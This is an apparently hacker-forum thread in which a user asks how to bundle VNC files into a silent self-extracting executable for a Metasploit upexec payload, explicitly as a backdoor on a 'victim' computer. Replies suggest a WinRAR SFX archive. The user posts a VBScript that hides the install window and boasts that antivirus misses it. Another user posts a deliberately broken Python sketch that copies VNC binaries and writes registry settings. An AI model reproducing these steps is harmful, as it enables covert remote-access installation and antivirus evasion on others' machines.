Jump to content

Self Extract then Execute HELP!


Deathray
 Share

Recommended Posts

Hi people. I would be so grateful for help with my situation.

I have 4 files.

install.bat

VNCHOOKS.DLL

WINVNC.EXE

VNC.REG

Is there any way to combine these 4 files into a single, self extracting .exe file which executes install.bat silently?

The reason being is because I am using the windows/upexec payload in Metasploit and want to install VNC as a service silently when executed for use future backdoor use.

Link to comment
Share on other sites

I think a WinRAR SFX archive might be what you're looking for.

It will compress and make all your files to a single executable which can run a file after the extraction.

Link to comment
Share on other sites

I think a WinRAR SFX archive might be what you're looking for.

It will compress and make all your files to a single executable which can run a file after the extraction.

Oh .. my... god! EXACTLY what I was looking for...

1 last problem - when the batch file gets executed the cmd.exe window pop's up - any way to hide that? Thanks in advance!! :):)

Link to comment
Share on other sites

Never mind I found a quick solution :)

Instead of 4 files I have 5 files. A new one called install.vbs

It contains this:

Set WshShell = CreateObject("WScript.Shell")

cmds=WshShell.RUN(".\install.bat", 0, True)

Set WshShell = Nothing

Now the batch file is completely invisible haha this is so cool :D Thanks you soooo much for your help :)

Link to comment
Share on other sites

Nice try USBHACKER! lol no but you can do all of that in less than 20lines of python and still hide the cmd window. You have to many files running, its just to sloppy.

lol yeah I did steal the batch + vnc from gonzors payload :D ... But I thought it was great because it installs itself as a service and no AntiVirus detect it as a virus plus windows firewall doesent seem to care VNC binding to a port :)

Yeah probably - but that would require me learning python first AND the victim would have to have python installed on his computer, which is not realistic and I want my lab to be realistic :).

Thanks Zimmer for the link. Hope you didn't use any more time than I would of if I looked for it by myself.

Link to comment
Share on other sites

Wouldnt that be more sloppy as it would require the executable file to contain the entire python runtime?

Nope, as a matter of fact I am making an exe to do all this atm. I will post the link to it later.

Source:

VNC.exe

import os,
from ConfigParser import ConfigParser
config.read('vnc.cfg')
newpath = config.get('Move To', 'Location')
vncauth =  config.get('VNC Auth', 'Password')
if not os.path.isdir(newpath):
srcname = "winvnc.exe"
srcname = "hooks.dll"
shutil.copy(srcname, newpath)
shutil.copy(srcname1, newpath)
f = open("VNC.reg", 'r')
f.write('Windows Registry Editor Version 5.00\n[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC][HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]\n')
f.write(vncauth)
f.write('REG SHIT')
f.close()
reg=os.popen3('VNC.reg','b')
runvnc=os.popen3(newpath + 'winvnc4.exe','b')

VNC.cfg

[Move To]
Location: C:\VNC
[VNC Auth]
Password: “Password”=hex:HEX COMMA SEPARATED PASS

Ask for permission to edit the registry but you get the idea. Less than 1MB and you can do pretty much what you want with it. Code is sloppy, missing shit and doesnt work on purpose.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...